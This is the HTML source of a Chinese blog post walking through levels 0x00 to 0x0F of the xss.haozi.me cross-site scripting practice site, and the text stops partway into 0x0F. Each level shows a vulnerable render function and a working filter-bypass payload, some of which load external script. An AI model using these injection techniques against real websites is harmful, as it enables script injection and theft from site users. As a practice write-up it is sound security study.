

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/Study/img/favicon.png">
  <link rel="icon" href="/Study/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="M0kY4n">
  <meta name="keywords" content="">
  
  <title>XSS弹窗练习 ：xss.haozi.me - M0kY4n&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/Study/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/Study/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"mokyan.github.io","root":"/Study/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/Study/js/utils.js" ></script>
  <script  src="/Study/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/Study/">&nbsp;<strong>MokYan</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/Study/">
                <i class="iconfont icon-home-fill"></i>
                主页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/Study/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/Study/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/Study/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/Study/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/Study/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="XSS弹窗练习 ：xss.haozi.me">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-07-05 18:39" pubdate>
        July 5, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.7k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      38
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      
<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">XSS弹窗练习 ：xss.haozi.me</h1>
            
            <div class="markdown-body">
              <h1 id="XSS弹窗闯关练习"><a href="#XSS弹窗闯关练习" class="headerlink" title="XSS弹窗闯关练习"></a>XSS弹窗闯关练习</h1><br>

<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这是一个xss弹窗练习平台，让你一个点一个点的理解 XSS。页面上展现了源码，方便直接，更易理解其原理。</p>
<blockquote>
<p>平台地址: <a target="_blank" rel="noopener" href="https://xss.haozi.me/#/">https://xss.haozi.me/#/</a></p>
</blockquote>
<p>首次进去需要输入一个昵称,且提醒你<code>请在 input code 框内输入代码，以至弹出 alert(1) 为过关</code></p>
<br>



<h2 id="0x00"><a href="#0x00" class="headerlink" title="0x00"></a>0x00</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&lt;div&gt;&#x27;</span> + input + <span class="hljs-string">&#x27;&lt;/div&gt;&#x27;</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">div</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">div</span>&gt;</span></span></code></pre></div>

<p>服务器端没有任何过滤直接执行JavaScript代码即可</p>
<div class="code-wrapper"><pre><code class="hljs js">payload:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span>alert(1)<span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span></span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-01.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x01"><a href="#0x01" class="headerlink" title="0x01"></a>0x01</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&lt;textarea&gt;&#x27;</span> + input + <span class="hljs-string">&#x27;&lt;/textarea&gt;&#x27;</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">textarea</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">textarea</span>&gt;</span></span></code></pre></div>

<p>服务器虽然没有进行过滤,但是前端的<code>textarea</code>标签会将JavaScript代码文本化直接输出，所以添加一个结束标签凑成一对就能绕过</p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
&lt;<span class="hljs-regexp">/textarea&gt;&lt;script&gt;alert(1)&lt;/</span>script&gt;</code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-02.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x02"><a href="#0x02" class="headerlink" title="0x02"></a>0x02</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&lt;input type=&quot;name&quot; value=&quot;&#x27;</span> + input + <span class="hljs-string">&#x27;&quot;&gt;&#x27;</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;name&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;&quot;</span>&gt;</span></span></code></pre></div>

<p>服务器依旧没有进行过滤,不过这次代码插入在<code>input</code>标签下的<code>value</code>属性下,依旧会吧JavaScript代码文本化直接输出,因此将<code>value的双引号</code>和<code>input的右尖括号</code>补全 即可绕过</p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
<span class="hljs-string">&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;</span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-03.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x03"><a href="#0x03" class="headerlink" title="0x03"></a>0x03</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  <span class="hljs-keyword">const</span> stripBracketsRe = <span class="hljs-regexp">/[()]/g</span>
  input = input.replace(stripBracketsRe, <span class="hljs-string">&#x27;&#x27;</span>)
  <span class="hljs-keyword">return</span> input
&#125;</code></pre></div>

<p>这题服务器终于对JavaScript代码进行过滤了,使用是正则表达式匹配,如果匹配成功就替换成空</p>
<ul>
<li>正则表达式<code>/[()]/g</code></li>
<li>末尾的g是<code>全局匹配</code></li>
<li>两条斜杠是代表<code>开始与结束的位置</code></li>
<li>方括号是表示匹配<code>方括号中的任意字符</code></li>
<li>这个正则表达式的意思就是,全局匹配<code>左括号和有括号</code></li>
</ul>
<p>染过方法有很多</p>
<div class="code-wrapper"><pre><code class="hljs html">payload:
可用反引号代替括号
<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;&quot;</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">alert</span>`<span class="hljs-attr">1</span>`&gt;</span>

可用Html实体编码表示左右括号
<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;&quot;</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">alert&amp;lpar;1&amp;rpar;</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;&quot;</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">alert&amp;#40;1&amp;#41;</span>&gt;</span>
<span class="hljs-symbol">&amp;lpar;</span>和<span class="hljs-symbol">&amp;#40;</span>表示左括号(
<span class="hljs-symbol">&amp;rpar;</span>和<span class="hljs-symbol">&amp;#41;</span>表示右括号)

可以引用外部js文件
<span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;https://xss.haozi.me/j.js&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-04.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x04"><a href="#0x04" class="headerlink" title="0x04"></a>0x04</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  <span class="hljs-keyword">const</span> stripBracketsRe = <span class="hljs-regexp">/[()`]/g</span>
  input = input.replace(stripBracketsRe, <span class="hljs-string">&#x27;&#x27;</span>)
  <span class="hljs-keyword">return</span> input
&#125;</code></pre></div>

<p>这题和0x03很像,就是正则表达式多了个反引号检测,所以0x03的payload除了第一条,其他都能用</p>
<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-05.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x05"><a href="#0x05" class="headerlink" title="0x05"></a>0x05</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  input = input.replace(<span class="hljs-regexp">/--&gt;/g</span>, <span class="hljs-string">&#x27;😂&#x27;</span>)
  <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&lt;!-- &#x27;</span> + input + <span class="hljs-string">&#x27; --&gt;&#x27;</span>
&#125;

前端代码:
&lt;!--  --&gt;</code></pre></div>

<p>服务器使用正则表达式进行了过滤,<code>--&gt;</code>被替换成😂,然而<code>&lt;!--</code>与<code>--&gt;</code>组成一个HTML注释,但是HTML还有一种与能与<code>&lt;!--</code>组成,就是<code>--!&gt;</code>,HTML会自动转为<code>--&gt;</code></p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
--!&gt;<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span>alert(1)<span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span></span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-06.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x06"><a href="#0x06" class="headerlink" title="0x06"></a>0x06</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  input = input.replace(<span class="hljs-regexp">/auto|on.*=|&gt;/ig</span>, <span class="hljs-string">&#x27;_&#x27;</span>)
  <span class="hljs-keyword">return</span> <span class="hljs-string">`&lt;input value=1 <span class="hljs-subst">$&#123;input&#125;</span> type=&quot;text&quot;&gt;`</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">value</span>=<span class="hljs-string">1</span>  <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;text&quot;</span>&gt;</span></span></code></pre></div>

<p>服务器依旧使用正则表达式过滤,把<code>auto</code>、<code>&gt;</code>、<code>on来头=结尾</code>,正则表达式的<code>i</code>是<code>不区分大小写</code>,但是正则表达式没有过滤换行</p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
onclick
=alert(<span class="hljs-number">1</span>)
单机文本框即可触发JavaScript代码</code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-07.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x07"><a href="#0x07" class="headerlink" title="0x07"></a>0x07</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  <span class="hljs-keyword">const</span> stripTagsRe = <span class="hljs-regexp">/&lt;\/?[^&gt;]+&gt;/gi</span>

  input = input.replace(stripTagsRe, <span class="hljs-string">&#x27;&#x27;</span>)
  <span class="hljs-keyword">return</span> <span class="hljs-string">`&lt;article&gt;<span class="hljs-subst">$&#123;input&#125;</span>&lt;/article&gt;`</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">article</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">article</span>&gt;</span></span></code></pre></div>

<p>服务器使用正则表达式,对<code>&lt;&gt;</code>括起来的内容进行过滤替换成空,但是由于<code>HTML</code>的容错性极高,所以,对于不闭合也能接受</p>
<div class="code-wrapper"><pre><code class="hljs html">payload:
<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;&quot;</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">alert(1)</span></span>
<span class="hljs-tag">     后面加\\ 空格 回车 才能触发</span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-08.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x08"><a href="#0x08" class="headerlink" title="0x08"></a>0x08</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">src</span>) </span>&#123;
  src = src.replace(<span class="hljs-regexp">/&lt;\/style&gt;/ig</span>, <span class="hljs-string">&#x27;/* \u574F\u4EBA */&#x27;</span>)
  <span class="hljs-keyword">return</span> <span class="hljs-string">`</span>
<span class="hljs-string">    &lt;style&gt;</span>
<span class="hljs-string">      <span class="hljs-subst">$&#123;src&#125;</span></span>
<span class="hljs-string">    &lt;/style&gt;</span>
<span class="hljs-string">  `</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">style</span>&gt;</span></span>
<span class="xml"></span>
<span class="xml">    <span class="hljs-tag">&lt;/<span class="hljs-name">style</span>&gt;</span></span></code></pre></div>

<p>服务器正则表达式过滤了我们想要闭合的<code>style标签</code>,且忽略了大小写,但是正则表达式是以一个整体来判断,所以在style闭合标签里面加入空格,就能绕过</p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
&lt;/style &gt;
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span> alert(1) <span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span></span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-09.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x09"><a href="#0x09" class="headerlink" title="0x09"></a>0x09</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  <span class="hljs-keyword">let</span> domainRe = <span class="hljs-regexp">/^https?:\/\/www\.segmentfault\.com/</span>
  <span class="hljs-keyword">if</span> (domainRe.test(input)) &#123;
    <span class="hljs-keyword">return</span> <span class="hljs-string">`&lt;script src=&quot;<span class="hljs-subst">$&#123;input&#125;</span>&quot;&gt;&lt;/script&gt;`</span>
  &#125;
  <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;Invalid URL&#x27;</span>
&#125;

前端代码:
Invalid URL</code></pre></div>

<p>服务器使用正则表达式限制了,必须使用<code>https://www.sogmentfault.com</code>开头,且放在<code>script</code>标签的<code>src</code>属性里面.所以我们需要闭合绕过</p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
https:<span class="hljs-comment">//www.segmentfault.com&quot;&gt;&lt;/script&gt;</span>
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;https://xss.haozi.me/j.js&quot;</span></span></span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-10.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x0A"><a href="#0x0A" class="headerlink" title="0x0A"></a>0x0A</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">escapeHtml</span>(<span class="hljs-params">s</span>) </span>&#123;
    <span class="hljs-keyword">return</span> s.replace(<span class="hljs-regexp">/&amp;/g</span>, <span class="hljs-string">&#x27;&amp;amp;&#x27;</span>)
            .replace(<span class="hljs-regexp">/&#x27;/g</span>, <span class="hljs-string">&#x27;&amp;#39;&#x27;</span>)
            .replace(<span class="hljs-regexp">/&quot;/g</span>, <span class="hljs-string">&#x27;&amp;quot;&#x27;</span>)
            .replace(<span class="hljs-regexp">/&lt;/g</span>, <span class="hljs-string">&#x27;&amp;lt;&#x27;</span>)
            .replace(<span class="hljs-regexp">/&gt;/g</span>, <span class="hljs-string">&#x27;&amp;gt;&#x27;</span>)
            .replace(<span class="hljs-regexp">/\//g</span>, <span class="hljs-string">&#x27;&amp;#x2f&#x27;</span>)
  &#125;

  <span class="hljs-keyword">const</span> domainRe = <span class="hljs-regexp">/^https?:\/\/www\.segmentfault\.com/</span>
  <span class="hljs-keyword">if</span> (domainRe.test(input)) &#123;
    <span class="hljs-keyword">return</span> <span class="hljs-string">`&lt;script src=&quot;<span class="hljs-subst">$&#123;escapeHtml(input)&#125;</span>&quot;&gt;&lt;/script&gt;`</span>
  &#125;
  <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;Invalid URL&#x27;</span>
&#125;

前端代码:
Invalid URL</code></pre></div>

<p>和<code>0x09</code>一样需要制定的Url开头,但是本题还将”&amp;、`、”、&lt;、&gt;、&quot;这些标点符号全部转换成HTML实体编码.因此本题不能通过闭合绕过,需要用到HTML的@特性,请求Url: <a target="_blank" rel="noopener" href="http://www.google.com@www.youtube.com/">www.google.com@www.youtube.com</a> 最后访问到是 YouTube , Google相当于做了一次跳转  </p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
https:<span class="hljs-comment">//www.segmentfault.com@xss.haozi.me/j.js</span></code></pre></div>

<p><code>注意:由于Chrome浏览器的一些安全机制,无法正常请求这个Url,所以这题改为使用Firefox浏览器</code></p>
<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-11.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>



<h2 id="0x0B"><a href="#0x0B" class="headerlink" title="0x0B"></a>0x0B</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  input = input.toUpperCase()
  <span class="hljs-keyword">return</span> <span class="hljs-string">`&lt;h1&gt;<span class="hljs-subst">$&#123;input&#125;</span>&lt;/h1&gt;`</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">h1</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">h1</span>&gt;</span></span></code></pre></div>

<p>这关使用了<code>toUpperCase</code>函数对输入的字符进行大写转换,HTML标签不区分大小写,但是JavaScript代码区分,也就是说<code>ALERT</code>不能执行.但是可以将JavaScript代码进行<code>uniocde</code>编码进行绕过</p>
<p><code>注意Unicode编码有两种结果,一个是中文转Unicode结果是\u开头的,另一个是ASCII转Unicode结果是&amp;#开头的.这里用ASCII转Unicode</code></p>
<div class="code-wrapper"><pre><code class="hljs html">payload:
<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;&quot;</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;</span>&gt;</span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-12.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>

<h2 id="0x0C"><a href="#0x0C" class="headerlink" title="0x0C"></a>0x0C</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  input = input.replace(<span class="hljs-regexp">/script/ig</span>, <span class="hljs-string">&#x27;&#x27;</span>)
  input = input.toUpperCase()
  <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&lt;h1&gt;&#x27;</span> + input + <span class="hljs-string">&#x27;&lt;/h1&gt;&#x27;</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">h1</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">h1</span>&gt;</span></span></code></pre></div>

<p>服务器使用正则表达式将<code>script</code>替换成空,且对输入的字符进行大写转换,使用<code>0x0B</code>的payload即可,不要相信网上用外部引入<code>j.js</code>,因为转为大写不存在这个文件</p>
<div class="code-wrapper"><pre><code class="hljs html">payload:
<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;&quot;</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;</span>&gt;</span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-13.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>

<h2 id="0x0D"><a href="#0x0D" class="headerlink" title="0x0D"></a>0x0D</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  input = input.replace(<span class="hljs-regexp">/[&lt;/&quot;&#x27;]/g</span>, <span class="hljs-string">&#x27;&#x27;</span>)
  <span class="hljs-keyword">return</span> <span class="hljs-string">`</span>
<span class="hljs-string">    &lt;script&gt;</span>
<span class="hljs-string">          // alert(&#x27;<span class="hljs-subst">$&#123;input&#125;</span>&#x27;)</span>
<span class="hljs-string">    &lt;/script&gt;</span>
<span class="hljs-string">  `</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript"></span></span>
<span class="javascript"><span class="xml">          <span class="hljs-comment">// alert(&#x27;&#x27;)</span></span></span>
<span class="javascript"><span class="xml">    </span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span></span></code></pre></div>

<p>服务器使用正则表达式对 <code>&lt; / &quot; &#39; </code>进行过滤替换成空,且在输入的地方进行单行注释,因为是单行注释所以换行就能绕过,但是由于后面接着<code>&#39;)</code>,所以必须屏蔽或闭合才能执行JavaScript代码,根据服务器端代码,只能使用 <code>--&gt;</code>来进行注释</p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:(注意有一行空行)

alert(<span class="hljs-number">1</span>)
--&gt;</code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-14.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>

<h2 id="0x0E-巨坑"><a href="#0x0E-巨坑" class="headerlink" title="0x0E(巨坑!!!)"></a>0x0E(巨坑!!!)</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  input = input.replace(<span class="hljs-regexp">/&lt;([a-zA-Z])/g</span>, <span class="hljs-string">&#x27;&lt;_$1&#x27;</span>)
  input = input.toUpperCase()
  <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&lt;h1&gt;&#x27;</span> + input + <span class="hljs-string">&#x27;&lt;/h1&gt;&#x27;</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">h1</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">h1</span>&gt;</span></span></code></pre></div>

<p>服务器使用正则表达式对以<code>&lt;</code>开头后面接大小写字母进行替换成<code>&lt;_</code>加大写字母,导致无法使用<code>script</code>标签,且大写的JavaScript代码无法执行,没有丝毫头绪,翻了下官方WP,了解到一些骚知识</p>
<p><code>ſ</code>是古英语中的s的写法, 转成大写是正常的<code>S</code></p>
<p><code>这也太骚了吧!!!,玩CTF吗???脑洞这么大</code></p>
<p><code>又是一个坑!!!,官方WP是引入j.js 由于大写转换后变成J.JS.文件不存在访问404.只能去自己的服务器写脚本引入自己的js文件</code></p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
&lt;ſcript src=<span class="hljs-string">&quot;http://自己的服务器/ALERT.JS&quot;</span>&gt;&lt;/script&gt;

ALERT.JS:
alert(<span class="hljs-number">1</span>)</code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-15.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>

<h2 id="0x0F"><a href="#0x0F" class="headerlink" title="0x0F"></a>0x0F</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">escapeHtml</span>(<span class="hljs-params">s</span>) </span>&#123;
    <span class="hljs-keyword">return</span> s.replace(<span class="hljs-regexp">/&amp;/g</span>, <span class="hljs-string">&#x27;&amp;amp;&#x27;</span>)
            .replace(<span class="hljs-regexp">/&#x27;/g</span>, <span class="hljs-string">&#x27;&amp;#39;&#x27;</span>)
